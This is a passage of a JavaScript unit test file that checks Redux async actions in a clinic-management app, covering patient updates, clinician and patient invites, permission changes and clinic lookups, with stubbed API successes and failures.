email: 'patientemail' }; let api = { clinics: { updateClinicPatient: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_UPDATING_CLINIC_PATIENT); err.status = 500; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type: 'UPDATE_CLINIC_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateClinicPatient(api, clinicId, patientUserId, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); it('[403] should trigger UPDATE_CLINIC_PATIENT_FAILURE and it should call error once for a failed request', () => { let patientUserId = 'patient_userId'; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let patient = { id: patientUserId, fullName: 'patientName', email: 'patientemail', }; let api = { clinics: { updateClinicPatient: sinon.stub() .callsArgWith(3, { status: 403, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_UPDATING_CLINIC_PATIENT_UNAUTHORIZED ); err.status = 403; let expectedActions = [ { type: 'UPDATE_CLINIC_PATIENT_REQUEST' }, { type: 'UPDATE_CLINIC_PATIENT_FAILURE', error: err, meta: { apiError: { status: 403, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch( async.updateClinicPatient(api, clinicId, patientUserId, patient) ); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_CLINIC_PATIENT_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updateClinicPatient.callCount).to.equal(1); }); }); describe('sendClinicianInvite', () => { it('should trigger SEND_CLINICIAN_INVITE_SUCCESS and it should call clinics.inviteClinician once for a successful request', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, null, clinician), }, }; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, clinician } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 409 status', () => { let clinician = { email:'<EMAIL>', roles: ['CLINIC_MEMBER'] }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub().callsArgWith(2, {status: 409, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_ALREADY_MEMBER); err.status = 409; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_ALREADY_MEMBER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); it('should trigger SEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinician = { email: '<EMAIL>', roles: ['CLINIC_MEMBER'], }; let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { inviteClinician: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 409; let expectedActions = [ { type: 'SEND_CLINICIAN_INVITE_REQUEST' }, { type: 'SEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicianInvite(api, clinicId, clinician)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinician.callCount).to.equal(1); }); }); describe('fetchClinicianInvite', () => { it('should trigger FETCH_CLINICIAN_INVITE_SUCCESS and it should call clinics.getClinicianInvite once for a successful request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let invite = { key: inviteId } let api = { clinics: { getClinicianInvite: sinon.stub().callsArgWith(2, null, invite), }, }; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, invite } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let api = { clinics: { getClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = '5f85fbe6686e6bb9170ab5d0'; let inviteId = 'inviteId123'; let api = { clinics: { getClinicianInvite: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITE_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvite.callCount).to.equal(1); }); }); describe('resendClinicianInvite', () => { it('should trigger RESEND_CLINICIAN_INVITE_SUCCESS and it should call clinics.resendClinicianInvite once for a successful request', () => { let inviteId = 'resendinvite' let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { resendClinicianInvite: sinon.stub().callsArgWith(2, null, { }), }, }; let expectedActions = [ { type: 'RESEND_CLINICIAN_INVITE_REQUEST' }, { type: 'RESEND_CLINICIAN_INVITE_SUCCESS', payload: { invite:{}, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.resendClinicianInvite.callCount).to.equal(1); }); it('should trigger RESEND_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let inviteId = 'resendinvite' let clinicId = '5f85fbe6686e6bb9170ab5d0'; let api = { clinics: { resendClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_RESENDING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'RESEND_CLINICIAN_INVITE_REQUEST' }, { type: 'RESEND_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.resendClinicianInvite.callCount).to.equal(1); }); }); describe('deleteClinicianInvite', () => { it('should trigger DELETE_CLINICIAN_INVITE_SUCCESS and it should call clinics.deleteClinicianInvite once for a successful request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_SUCCESS', payload: { clinicId, inviteId, result:{}, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); it('should trigger DELETE_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); it('should trigger DELETE_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { deleteClinicianInvite: sinon.stub() .callsArgWith(2, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_DELETING_CLINICIAN_INVITE_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'DELETE_CLINICIAN_INVITE_REQUEST' }, { type: 'DELETE_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deleteClinicianInvite(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_CLINICIAN_INVITE_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.deleteClinicianInvite.callCount).to.equal(1); }); }); describe('sendClinicInvite', () => { it('should trigger SEND_CLINIC_INVITE_SUCCESS and it should call clinics.inviteClinic once for a successful request', () => { let shareCode = 'shareCode123'; let permissions = { view: {} }; let patientId = 'patientIdABC'; let api = { clinics: { inviteClinic: sinon.stub().callsArgWith(3, null, { my: 'invite' }), }, }; let expectedActions = [ { type: 'SEND_CLINIC_INVITE_REQUEST' }, { type: 'SEND_CLINIC_INVITE_SUCCESS', payload: { invite: { my: 'invite' }, } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicInvite(api, shareCode, permissions, patientId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinic.callCount).to.equal(1); }); it('should trigger SEND_CLINIC_INVITE_FAILURE and it should call error once for a failed request', () => { let shareCode = 'shareCode123'; let permissions = { view: {} }; let patientId = 'patientIdABC'; let api = { clinics: { inviteClinic: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_SENDING_CLINIC_INVITE); err.status = 500; let expectedActions = [ { type: 'SEND_CLINIC_INVITE_REQUEST' }, { type: 'SEND_CLINIC_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.sendClinicInvite(api, shareCode, permissions, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_CLINIC_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.inviteClinic.callCount).to.equal(1); }); }); describe('fetchPatientInvites', () => { it('should trigger FETCH_PATIENT_INVITES_SUCCESS and it should call clinics.getPatientInvites once for a successful request', () => { let clinicId = 'clinicId345'; let invites = ['invite<PASSWORD>']; let api = { clinics: { getPatientInvites: sinon.stub().callsArgWith(1, null, invites), }, }; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_SUCCESS', payload: { clinicId, invites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_INVITES_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId345'; let invites = ['invite<PASSWORD>']; let api = { clinics: { getPatientInvites: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_INVITES_FAILURE and it should call error once for a failed request with a 401 status', () => { let clinicId = 'clinicId345'; let invites = ['inviteId1']; let api = { clinics: { getPatientInvites: sinon.stub() .callsArgWith(1, { status: 401, body: 'Error!' }, null), }, }; let err = new Error( ErrorMessages.ERR_FETCHING_PATIENT_INVITES_UNAUTHORIZED ); err.status = 401; let expectedActions = [ { type: 'FETCH_PATIENT_INVITES_REQUEST' }, { type: 'FETCH_PATIENT_INVITES_FAILURE', error: err, meta: { apiError: { status: 401, body: 'Error!' } }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_INVITES_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); }); describe('acceptPatientInvitation', () => { it('should trigger ACCEPT_PATIENT_INVITATION_SUCCESS and it should call clinics.acceptPatientInvitation once for a successful request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { acceptPatientInvitation: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'ACCEPT_PATIENT_INVITATION_REQUEST' }, { type: 'ACCEPT_PATIENT_INVITATION_SUCCESS', payload: { clinicId: 'clinicId123', inviteId: 'inviteIdABC', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptPatientInvitation(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.acceptPatientInvitation.callCount).to.equal(1); }); it('should trigger ACCEPT_PATIENT_INVITATION_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { acceptPatientInvitation: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_ACCEPTING_PATIENT_INVITATION); err.status = 500; let expectedActions = [ { type: 'ACCEPT_PATIENT_INVITATION_REQUEST' }, { type: 'ACCEPT_PATIENT_INVITATION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptPatientInvitation(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_PATIENT_INVITATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.acceptPatientInvitation.callCount).to.equal(1); }); }); describe('updatePatientPermissions', () => { it('should trigger UPDATE_PATIENT_PERMISSIONS_SUCCESS and it should call clinics.updatePatientPermissions once for a successful request', () => { let clinicId = 'clinicId123'; let patientId = 'patient234'; let permissions = { view: {}, upload: {}}; let api = { clinics: { updatePatientPermissions: sinon.stub().callsArgWith(3, null, permissions), }, }; let expectedActions = [ { type: 'UPDATE_PATIENT_PERMISSIONS_REQUEST' }, { type: 'UPDATE_PATIENT_PERMISSIONS_SUCCESS', payload: { clinicId, patientId, permissions } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatientPermissions(api, clinicId, patientId, permissions)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updatePatientPermissions.callCount).to.equal(1); }); it('should trigger UPDATE_PATIENT_PERMISSIONS_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let patientId = 'patient234'; let permissions = { view: {}, upload: {}}; let api = { clinics: { updatePatientPermissions: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_UPDATING_PATIENT_PERMISSIONS); err.status = 500; let expectedActions = [ { type: 'UPDATE_PATIENT_PERMISSIONS_REQUEST' }, { type: 'UPDATE_PATIENT_PERMISSIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatientPermissions(api, clinicId, patientId, permissions)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT_PERMISSIONS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updatePatientPermissions.callCount).to.equal(1); }); }); describe('fetchClinicsForPatient', () => { it('should trigger FETCH_CLINICS_FOR_PATIENT_SUCCESS and it should call clinics.getClinicsForPatient once for a successful request', () => { let userId = 'user123'; let clinics = [{ patient: { id: 'user123', email: '<EMAIL>' }, clinic: { id: 'clinic234', name: 'Clinic Name' } }] let api = { clinics: { getClinicsForPatient: sinon.stub().callsArgWith(2, null, clinics), }, }; let expectedActions = [ { type: 'FETCH_CLINICS_FOR_PATIENT_REQUEST' }, { type: 'FETCH_CLINICS_FOR_PATIENT_SUCCESS', payload: { clinics } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsForPatient(api, userId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForPatient.callCount).to.equal(1); }); it('should trigger FETCH_CLINICS_FOR_PATIENT_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let api = { clinics: { getClinicsForPatient: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_PATIENT); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICS_FOR_PATIENT_REQUEST' }, { type: 'FETCH_CLINICS_FOR_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsForPatient(api, userId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForPatient.callCount).to.equal(1); }); }); describe('fetchClinicianInvites', () => { it('should trigger FETCH_CLINICIAN_INVITES_SUCCESS and it should call clinics.getClinicianInvites once for a successful request', () => { let userId = 'user123'; let invites = ['inviteId'] let api = { clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, invites), }, }; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvites(api, userId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvites.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_INVITES_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let api = { clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvites(api, userId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvites.callCount).to.equal(1); }); }); describe('acceptClinicianInvite', () => { it('should trigger ACCEPT_CLINICIAN_INVITE_SUCCESS and it should call clinics.acceptClinicianInvite once for a successful request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { acceptClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'ACCEPT_CLINICIAN_INVITE_REQUEST' }, { type: 'ACCEPT_CLINICIAN_INVITE_SUCCESS', payload: { inviteId: 'inviteId345' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.acceptClinicianInvite.callCount).to.equal(1); }); it('should trigger ACCEPT_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { acceptClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_ACCEPTING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'ACCEPT_CLINICIAN_INVITE_REQUEST' }, { type: 'ACCEPT_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.acceptClinicianInvite.callCount).to.equal(1); }); }); describe('dismissClinicianInvite', () => { it('should trigger DISMISS_CLINICIAN_INVITE_SUCCESS and it should call clinics.dismissClinicianInvite once for a successful request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { dismissClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DISMISS_CLINICIAN_INVITE_REQUEST' }, { type: 'DISMISS_CLINICIAN_INVITE_SUCCESS', payload: { inviteId: 'inviteId345' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.dismissClinicianInvite.callCount).to.equal(1); }); it('should trigger DISMISS_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let inviteId = 'inviteId' let api = { clinics: { dismissClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DISMISSING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'DISMISS_CLINICIAN_INVITE_REQUEST' }, { type: 'DISMISS_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISMISSING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.dismissClinicianInvite.callCount).to.equal(1); }); }); describe('getClinicsForClinician', () => { it('should trigger GET_CLINICS_FOR_CLINICIAN_SUCCESS and it should call clinics.getClinicsForClinician once for a successful request', () => { let clinicianId = 'clinicianId1'; let clinics = [ { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }, ]; let api = { clinics: { getClinicsForClinician: sinon.stub().callsArgWith(2, null, clinics), }, }; let expectedActions = [ { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 'clinicianId1', clinics } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getClinicsForClinician(api, clinicianId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForClinician.callCount).to.equal(1); }); it('should trigger GET_CLINICS_FOR_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let clinicianId = 'clinicianId1'; let api = { clinics: { getClinicsForClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN); err.status = 500; let expectedActions = [ { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } 